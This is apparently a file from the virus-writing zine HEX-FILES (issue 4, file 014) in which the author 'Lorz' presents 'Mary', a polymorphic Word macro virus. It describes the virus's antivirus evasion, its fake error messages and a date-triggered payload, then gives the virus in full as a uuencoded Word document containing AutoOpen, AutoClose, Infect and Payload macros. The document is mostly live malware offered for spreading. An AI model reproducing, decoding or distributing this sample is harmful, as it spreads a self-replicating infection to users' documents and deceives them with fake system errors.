 
  HEX-FILES No. 4                                                   File 014
 ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ 
 
                                    Mary
 
                             A Word Macro Virus
 
                                     by
 
                                    Lorz
 
                            lorz@hackerz.zzn.com
                      http://members.tripod.com/~Lorz/
 
 
 
 
    Here's something about Mary:
    
 
       It is polymorphic. It uses random names for its macro names to 
       hide its identity. This would give AV's a thrill of their lives.
        
 
       On January 21st, it disables the cancel button, handy when you 
       closing a document, and displays a message box with:
 
                         Mary was proudly made by Lorz
 
       It is polymorphic. This will give AV's a thrill of their lives. If 
       someone tries to look at the macros, it displays a message box 
       with:
 
                         Memory, Stack Error at CS:1000
 
       In addition, it shows another message box:
 
                           System Unstable
                           Please reboot you computer 
 
        when someone closes the document.
 
 
 ÄÄ MARY.UUE STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 

begin 644 mary.doc
MT,\1X*&Q&N$`````````````````````/@`#`/[_"0`&```````````````!
M````(0``````````$```(P````(```#^____`````"````#_____________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_______________________LI<$`1P`)!````!*_````````$```````!```
M'@0```X`8FIB:H[9CMD````````````````````````)!!8`'@P``.RS`0#L
MLP$`'@````````````````````````````````````````#__P\`````````
M``#__P\```````````#__P\``````````````````````%T``````)(`````
M````D@```)(`````````D@````````"2`````````)(`````````D@```!0`
M`````````````,(`````````P@````````#"`````````,(`````````P@``
M``P```#.````#````,(`````````"@8``+8```#F`````````.8`````````
MY@````````#F`````````.8`````````Y@````````#F`````````.8`````
M````U`$``/T#``#1!0```````-$%````````T04```````#1!0```````-$%
M````````T04``"0```#`!@``]`$``+0(``"D````]04``!4`````````````
M````````````D@````````#F``````````````````````````````#F````
M`````.8`````````Y@````````#F`````````/4%````````#`$```````"2
M`````````)(`````````Y@```````````````````.8`````````Y@``````
M```,`0````````P!````````#`$```````#F````%@```)(`````````Y@``
M``````"2`````````.8`````````U`$`````````````````````````````
MI@````X```"T````#@```)(`````````D@````````"2`````````)(`````
M````Y@````````#4`0````````P!``#(````#`$``````````````````-0!
M````````D@````````"2````````````````````````````````````````
M````````````````````````````````````````````U`$```````#F````
M`````-H````,````H+^.`&W8N@'"`````````,(`````````_````!````#4
M`0``````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````5$A%($U!4ED@34%#4D\@5DE255,@0EDZ($Q/4EH-````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````!```'@0``/T`````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````````1#2C```0`$```>
M!```_```````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````,```,D`0`!``0``!X$````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````$<`!^PT"\@L.`](;`(!R*P
M"`<CD*`%))"@!26P````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````$@`/``H``0!;``\``@`````````D``!`\?\"
M`"0````&`$X`;P!R`&T`80!L`````@````0`;4@)!```````````````````
M`````#P`04#R_Z$`/````!8`1`!E`&8`80!U`&P`=``@`%``80!R`&$`9P!R
M`&$`<`!H`"``1@!O`&X`=```````````````````````'@````,```P```0`
M_____P$````$(/__`0```````````!X`````````````!```'@0```,`````
M!```'@0```0`````!```'@0```4`````````"0````X````@````!P`$``<`
M`````!T````@````!``'`/__!````!``(``@`"``(``@`"``(``@`"``(``@
M`"``(``@`"``(``R`$,`.@!<`%<`20!.`$0`3P!7`%,`7`!4`$4`30!0`%P`
M00!U`'0`;P!2`&4`8P!O`'8`90!R`'D`(`!S`&$`=@!E`"``;P!F`"``1`!O
M`&,`=0!M`&4`;@!T`#$`+@!A`',`9``0`"``(``@`"``(``@`"``(``@`"``
M(``@`"``(``@`"``"P!!`#H`7`!-`&$`<@!Y`"X`9`!O`&,`_P$(````5@``
M````__\`````````````````````5@`!``$`__\`````````````````````
M5@`"``(`__\`````````````````````5@`%``4`__\`````````````````
M````5@`&``8`__\`````````````````````5@`'``<`__\`````````````
M````````5@`(``@`__\`````````````````````5@`)``D`__\`````````
M````````````$/__"@`"`!4`4`!R`&\`:@!E`&,`=``N`$T`;P!D`'4`;`!E
M`#$`+@!0`&\`;`!L`'D``0`4`%``<@!O`&H`90!C`'0`+@!-`&\`9`!U`&P`
M90`Q`"X`4@!U`&X`,0`!`!0`4`!R`&\`:@!E`&,`=``N`$T`;P!D`'4`;`!E
M`#$`+@!2`'4`;@`R``$````````````8`%``<@!O`&H`90!C`'0`+@!-`&\`
M9`!U`&P`90`Q`"X`00!U`'0`;P!/`'``90!N``$`%P!0`'(`;P!J`&4`8P!T
M`"X`30!O`&0`=0!L`&4`,0`N`%``80!Y`&P`;P!A`&0``0`9`%``<@!O`&H`
M90!C`'0`+@!-`&\`9`!U`&P`90`Q`"X`00!U`'0`;P!#`&P`;P!S`&4``0`6
M`%``<@!O`&H`90!C`'0`+@!-`&\`9`!U`&P`90`Q`"X`20!N`&8`90!C`'0`
M`0`:`%``<@!O`&H`90!C`'0`+@!-`&\`9`!U`&P`90`Q`"X`5`!O`&\`;`!S
M`$T`80!C`'(`;P`!`!$(``$`%`!0`%(`3P!*`$4`0P!4`"X`30!/`$0`50!,
M`$4`,0`N`%(`50!.`#$````"`!0`4`!2`$\`2@!%`$,`5``N`$T`3P!$`%4`
M3`!%`#$`+@!2`%4`3@`R```````5`%``4@!/`$H`10!#`%0`+@!-`$\`1`!5
M`$P`10`Q`"X`4`!/`$P`3`!9````"``6`%``4@!/`$H`10!#`%0`+@!-`$\`
M1`!5`$P`10`Q`"X`20!.`$8`10!#`%0````&`!<`4`!2`$\`2@!%`$,`5``N
M`$T`3P!$`%4`3`!%`#$`+@!0`$$`60!,`$\`00!$````!0`8`%``4@!/`$H`
M10!#`%0`+@!-`$\`1`!5`$P`10`Q`"X`00!5`%0`3P!/`%``10!.````!P`9
M`%``4@!/`$H`10!#`%0`+@!-`$\`1`!5`$P`10`Q`"X`00!5`%0`3P!#`$P`
M3P!3`$4````)`!H`4`!2`$\`2@!%`$,`5``N`$T`3P!$`%4`3`!%`#$`+@!4
M`$\`3P!,`%,`30!!`$,`4@!/````0`&``0`)````"0```%";=0"H`*@`"0``
M```````%``````````(0`````````!X````P```(`$````,```!'%I`!```"
M`@8#!00%`@,$`P````````````````````$`````````5`!I`&T`90!S`"``
M3@!E`'<`(`!2`&\`;0!A`&X````U%I`!`@`%!0$"`0<&`@4'`````````!``
M`````````````(``````4P!Y`&T`8@!O`&P````S)I`!```""P8$`@("`@($
M`P````````````````````$`````````00!R`&D`80!L````(@`$`/$(B!@`
M`-`"``!H`0````!`$`%&4!`!1@`````!``@```````````````$``0````0`
M`Q`!```````````````!``$````!`````````-$"````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````*4&P`>T`+0`@`!R,```
M````````````````````````````````````````````````````````````
M```````````````````````````````````````````````"````@P'__Q(`
M````````'0!4`$@`10`@`$T`00!2`%D`(`!-`$$`0P!2`$\`(`!6`$D`4@!5
M`%,`(`!"`%D`.@`@`$P`3P!2`%H`````````$``@`"``(``@`"``(``@`"``
M(``@`"``(``@`"``(``@`!``(``@`"``(``@`"``(``@`"``(``@`"``(``@
M`"``(```````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````/[_```$``(```````````````````````$`
M``#@A9_R^4]H$*N1"``K)[/9,````(0!```0`````0```(@````"````D```
M``,```"X````!````,0````%````X`````<```#L````"````/P````)````
M&`$``!(````D`0``"@```$`!```,````3`$```T```!8`0``#@```&0!```/
M````;`$``!````!T`0``$P```'P!```"````Y`0``!X````>````5$A%($U!
M4ED@34%#4D\@5DE255,@0EDZ($Q/4EH`36D>`````0````!(12`>````$0``
M`"`@("`@("`@("`@("`@("``4E53'@````$`````;VUI'@````<```!.;W)M
M86P`(!X````1````("`@("`@("`@("`@("`@(`!255,>`````@```#$`;6D>
M````$P```$UI8W)O<V]F="!7;W)D(#@N,`!30``````P&AX!````0`````!H
M\Y5JV+H!0`````#()])LV+H!`P````$````#``````````,``````````P``
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````#^_P``!``"```````````````````````"
M`````M7-U9PN&Q"3EP@`*RSYKD0````%U<W5G"X;$).7"``K+/FN8`$``!P!
M```,`````0```&@````/````<`````4```"4````!@```)P````1````I```
M`!<```"L````"P```+0````0````O````!,```#$````%@```,P````-````
MU`````P```#^`````@```.0$```>````&0```%(@("`@("`@("`@("`@("`@
M("`@("`@(```4@`#`````0````,````!`````P`````````#````LPT(``L`
M````````"P`````````+``````````L`````````'A````$````>````5$A%
M($U!4ED@34%#4D\@5DE255,@0EDZ($Q/4EH`#!````(````>````!@```%1I
M=&QE``,````!````F`````,`````````(`````$````V`````@```#X````!
M`````@````H```!?4$E$7T=5240``@```.0$``!!````3@```'L`-0!$`#4`
M0P`W`$4`0P!&`"T`-``T`$$`,0`M`#$`,0!#`$8`+0`Y`$,`-0`Y`"T`,``P
M`#``,``P`#$`,P`U`#$`.0`U`#<`?0``````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````0````(````#````!`````4````&````
M!P```/[___\)````"@````L````,````#0````X````/````_O___Q$````2
M````$P```!0````5````%@```!<```#^____&0```!H````;````'````!T`
M```>````'P```/[____]____(@```"<```!(````)0```"8````Y````00``
M`"D````J````*P```"P````M````+@```/[___\P````,0```#(````S````
M-````#4````V````-P```#@````H````.@```#L````\````/0```#X````_
M````0````$(```!'````0P```$0```!%````1@```$D```#^_____O____[_
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M__________________________________________________]2`&\`;P!T
M`"``10!N`'0`<@!Y````````````````````````````````````````````
M````````````````%@`%`?__________`P````8)`@``````P````````$8`
M```````````````@E'`!;=BZ`20```!`(0```````#$`5`!A`&(`;`!E````
M````````````````````````````````````````````````````````````
M```````.``(`________________````````````````````````````````
M````````````````"``````0````````5P!O`'(`9`!$`&\`8P!U`&T`90!N
M`'0``````````````````````````````````````````````````````!H`
M`@$%````__________\`````````````````````````````````````````
M`````````````!`````````%`%,`=0!M`&T`80!R`'D`20!N`&8`;P!R`&T`
M80!T`&D`;P!N````````````````````````````````````*``"`0(````$
M````_____P```````````````````````````````````````````````!``
M````$`````````4`1`!O`&,`=0!M`&4`;@!T`%,`=0!M`&T`80!R`'D`20!N
M`&8`;P!R`&T`80!T`&D`;P!N```````````````X``(!________________
M````````````````````````````````````````````````&``````0````
M````30!A`&,`<@!O`',`````````````````````````````````````````
M``````````````````````````````X``0$!````$0```!``````````````
M`````````````````,"7,?=LV+H!H+^.`&W8N@$```````````````!6`$(`
M00``````````````````````````````````````````````````````````
M````````````````````"``!`/__________"0``````````````````````
M````````P)<Q]VS8N@%`VQ7_;-BZ`0```````````````%0`:`!I`',`1`!O
M`&,`=0!M`&4`;@!T````````````````````````````````````````````
M```````````:``(!_____PL```#_____````````````````````````````
M`````````````````````````&`$`````````0````(````#````!`````4`
M```&````!P````@````)````"@````L````,````#0````X````/````$```
M`!$```#^____$P```!0```#^_____O___Q<````8````&0```!H````;````
M'````!T````>````'P```"`````A````(@```",````D````)0```"8````G
M````*````"D````J````*P```"P````M````+@```"\````P````,0```#(`
M```S````-````#4````V````-P```#@````Y````.@```#L````\````/0``
M`#X````_````0````$$```!"````0P```$0```!%````1@```$<```!(````
M20```$H```!+````3````$T```!.````3P```%````!1````4@```%,```!4
M````_O___U8```!7````6````%D```!:````6P```%P```!=````7@```%\`
M``#^____80```&(```!C````9````&4```!F````9P```&@```!I````:@``
M`&L```!L````;0```&X```!O````<````'$```!R````<P```'0```!U````
M=@```'<```#^____>0```/[___][````_O___WT```!^````?P```(`````!
M%@$`!K8`__\!`0````#_____`````/__/`#__P``SGY<7:%$SQ&<60```349
M5V<U&%$%1,\1G%<```$U&5<``````````````````````0#-?EQ=H43/$9Q9
M```!-1E7$`````,````%````!P```/__________`0$(````_____W@```#Z
M````8@,``!`"``#_____``````$```!V371-``#__Z,```"(````",U^7%VA
M1,\1G%D```$U&5?.?EQ=H43/$9Q9```!-1E7__\``'X#``#R````\@```-(#
M``````$```#_____-````/____\`````WP#__P````#_________________
M____________________________________________________________
M____________________________________________________________
M____________________________________*`````(`4R+_____```!`%,0
M_____P```0!3(O____\`````-B+_____``#__P$!``````$`*``Q`$X`;P!R
M`&T`80!L`"X`5`!H`&D`<P!$`&\`8P!U`&T`90!N`'0`N1;H,`X``2(`*@!<
M`%(`9@!F`&8`9@`J`&$`,P`P`&4`.``Q`#0`,P!F`-\)````_____P$!T```
M``*!_O___________R@``````/__``````````#__________P`````=````
M)````/____](`````H/^______\(`/__8```````________`````/______
M____`````!T`#``D````@J`0`O_____^____D`````(`___^____`````/__
M________`````!T`#``D`````H/^______\(`/__P```````________````
M`/__________`````!T`#``D````_____S`````````````!`````````/__
M_____________P````#_____________________`````/__________:```
M`)@``````````````$``!```````A`.$`___________________________
M__\(``$`,````$U%``#_______\`````__\`````__\!`0``````````````
M````````````````````````````````````````````````````````````
M``````````#^R@$```#_____`0$(````_____W@````!BK``071T<FEB=70`
M92!60E].86T`92`](")4:&D`<T1O8W5M96X0="(-"@J,0F%S`0*,,4YO<FUA
M;`(N&59#<F5A=&$$8FP!8$9A;'-E`0R64')E9&5C;!)A``9)9`!X5')U@0TB
M17AP;W-E%!P`5&5M<&QA=&4@1&5R:785)$-UP'-T;VUI>@2'`V,`````````
M``````````````````````````````````!R58``````````@````(``````
M````&P````D`````````"0```````P`H`````````````````````0`!``$`
M"0<````````Q!P```````%D'````````"0````$`!`#A!@````````@``P`T
M````@0<```````!A```````!`*D'````````________________``#_____
M________________``#:`&,``'\```````````````````````!R58``````
M````@````(``````````#@````D```````(`__________\`````0`````0`
M`````'```'\`````S&%>```!`/\)!```"00``.0$`0````````````$`!@`"
M`!8!*@!<`$<`>P`P`#``,``R`#``-`!%`$8`+0`P`#``,``P`"T`,``P`#``
M,``M`$,`,``P`#``+0`P`#``,``P`#``,``P`#``,``P`#0`-@!]`",`,P`N
M`#``(P!?`%\`4P!2`%``7P`R````````````````````````````````````
M````````````````````````````````$``"`/_______________P``````
M`````````````````````````````````````````!(```"R`````````%\`
M7P!3`%(`4`!?`#,`````````````````````````````````````````````
M```````````````````````0``(!"@````<```#_____````````````````
M````````````````````````````````%0```$``````````30!O`&0`=0!L
M`&4`,0``````````````````````````````````````````````````````
M`````````````!```@`,````#@```/____\`````````````````````````
M```````````````````````O````6"$```````!?`%8`0@!!`%\`4`!2`$\`
M2@!%`$,`5```````````````````````````````````````````````````
M````&@`"`/_______________P``````````````````````````````````
M`````````````!8```"0#P````````!&`*X``0!)`"<@.`)G```````@('0"
MK@`!`#,`!0"4`$8`K@`!`$H`)R`X`F<``````"`@=`*N``$`-``%`)0`1@"N
M``$`2P`G(#@"9P``````("!T`JX``0`U``4`E`!&`*X``0!,`"<@.`)G````
M```@('0"K@`!`#8`!0"4`$8`K@`!`$T`)R`X`F<``````"`@=`*N``$`-P`%
M`)0`1@"N``$`3@`G(#@"9P``````("!T`JX``0`X``4`E`!&`*X``0!/`"<@
M.`)G```````@('0"K@`!`#D`!0"4`$8`K@`!`%``)R`X`F<``````"`@=`*N
M``$`,``%`)0`1@"N``$`40`G(#@"9P``````("!V`JX``0`Q``4`E`!&`*X`
M`0!!`"<@.@)G```````@('8"K@`!`#(`!0"4`$8`K@`!`$(`)R`Z`F<`````
M`"`@=@*N``$`,P`%`)0`1@"N``$`0P`G(#H"9P``````("!V`JX``0`T``4`
ME`!&`*X``0!$`"<@.@)G```````@('8"K@`!`#4`!0"4`$8`K@`!`$4`)R`Z
M`F<``````"`@=@*N``$`-@`%`)0`1@"N``$`1@`G(#H"9P``````("!V`JX`
M`0`W``4`E`!&`*X``0!'`"<@.@)G```````@('8"K@`!`#@`!0"4`$8`K@`!
M`$@`)R`Z`F<``````"`@=@*N``$`.0`%`)0`1@"N``$`20`G(#H"9P``````
M("!V`JX``0`P``4`E`!&`*X``0!*`"<@.@)G```````@('@"K@`!`#$`!0"4
M`$8`K@`!`%(`)R`\`F<``````"`@>`*N``$`,@`%`)0`1@"N``$`4P`G(#P"
M9P``````("!X`JX``0`S``4`E`!&`*X``0!4`"<@/`)G```````@('@"K@`!
M`#0`!0"4`$8`K@`!`%4`)R`\`F<``````"`@>`*N``$`-0`%`)0`1@"N``$`
M5@`G(#P"9P``````("!X`JX``0`V``4`E`!&`*X``0!7`"<@/`)G```````@
M('@"K@`!`#<`!0"4`$8`K@`!`%@`)R`\`F<``````"`@>`*N``$`.``%`)0`
M1@"N``$`60`G(#P"9P``````("!X`JX``0`Y``4`E`!&`*X``0!:`"<@/`)G
M```````@('@"K@`!`#``!0"4`$8`K@`!`%$`)R`\`F<``````"`@I@`@(#@"
M"P`@(#H""P`@(#P""P`G(#8"````````9@#__Q@'``"/!#@"`````$%`?`(`
M````04`<`@````!!0'X"`````&P`___P!@``CP1X`@`````U`$X"I``;``4`
M-0!0`J0``0`%`#4`"`&N``8`0V%N8V5L!0`U`(`"-0!4`J0````%`$%`3`(%
M`"0`A`(``"0`@@(!`*0``0`%`)4`$````"0`A`(``"0`A@(!`*0`%0`%`)4`
M(````*X`'0!-87)Y('=A<R!P<F]U9&QY(&UA9&4@8GD@3&]R>@!!0#("`0!H
M`/__4`8``&@`__](!@``;`#__T`&``"/!+@"`````,$`B@(P!@``04!\`@``
M``!!0!P"`````"``C`)"0(X"``````````!!0'X"`````*X`*P!3>7-T96T@
M56YS=&%B;&4L(%!L96%S92!R96)O;W0@>6]U(&-O;7!U=&5R`$%`,@(!````
MI``"`"``D@)!0)`"`@```)L`B@*X!0``;`#__[`%``"/!/@"`````"`@"`&N
M``\`1VQO8F%L.D%U=&]/<&5N`$%`2`("````("`(`:X`#`!';&]B86PZ4&]L
M;'E!0$@"`@`````````@(`@!K@`0`$=L;V)A;#I!=71O0VQO<V5!0$@"`@``
M`"`@"`&N``X`1VQO8F%L.E!A>6QO861!0$@"`@``````("`(`:X`$0!';&]B
M86PZ5&]O;'--86-R;P!!0$@"`@`D()0"``"N``D`.D%U=&]/<&5N``L`)R`(
M`0```````"0@E`(``*X`"@`Z075T;T-L;W-E"P`G(`@!````````)""4`@``
MK@`+`#I4;V]L<TUA8W)O``L`)R`(`0`````U``@!K@`'`%!A>6QO860`!0`U
M`)@"-0":`J0````%`#4`G`*N````!0`U`)X"K@````4`04"6`@4`````````
M;`#__V`$``"/!#@#`````,$`B@)0!```04!^`@````">``0`!````*X`'@!-
M96UO<GDL(%-T86-K($5R<F]R(&%T($-3.C$P,##(`*X`%P!-96UO<GD@06QL
M;V-A=&EO;B!%<G)O<@!!0#("`P```$%`?`(`````FP"*`N@#``!L`/__T`,`
M`/_____8`P```5FV`$%T=')I8G5T`&4@5D)?3F%M`&4@/2`B36]D`'5L93$B
M#0I3`'5B(%!O;&QY`"@I#0I/;B!%`')R;W(@1V]4`F\`$&YE#0I!)*$`8$9I
M;&4!=B0!2@A)9B`"*"(B(%0(:&5N`UA&:6YI$'-H#0H`.%9);H!S=&%L;&5D
M`'(B,`)&#0H@!`!2=31N,0H-,@<-`65380!V94%L;"`Q+.(@`"=%;',`@@4[
M`I4$1&\!E45N9"!)HF8`.@T*1P`0.B"G'X<S@B,%6`LQ`%UE<G1X("(@`(V(
M,0,6@#)-('-G0F]X`*!A<@!Y('=A;G1S(`!A(&-R86-K90!R(BP@+3@-"K\!
M&X"J@DV!KH%X`9M8`J0`=6XD*$8D+"!*1X`!2(`!2B2`NUEA%PT@#0I:@0Z`
M'BM((%DD@BI2,8$(1P!E=$1O8W5M90!N=%9A<B0H(J)-@$E6:7(`"B*`*0Q#
M3P$2"-P@*R`B##HB0`&`#PT*36$`8W)O0V]P>2`!``HL(")';&]B%&%LP@=:
M0!E397104')O9H!]4X"/;H!G("));G1L0#@QP`%F;S(``D$)5&\`;VQS0W5S
M=&\`;6EZ94ME>6)`;V%R9"`N0`)#!&]D09HV-2P@+D!#871E9V\`3#TL(#*`
M`P2A6D`_+D$$9&0!"&]N=&5X9G2!B\A/#0J#IP!0,GL_4`I0,A)0`$_!)D%/
M3WI#5D\R@$='3P`*;4\Q'69/,X%+=$\`CD9U;L!C=&EO;B`G<N$HOD-B&\!'
M*CP`2$D\,:$@'P5O*WI@4`0#@'U#;W4$;G3"(7,H,"D@K#X@#7YE"$;`BFD@
M//PQ($"+JP8'"H4%``MB"D'!,20H:2P@0`L]_B`!%R&.[P7E!@H5Z(SE`^M&
M>@0"3J%.:6-.P8GA`W.E)J`,#0I&*``!$'=/`FZ!7#$Q-CD-"@A4=V_`&SDR
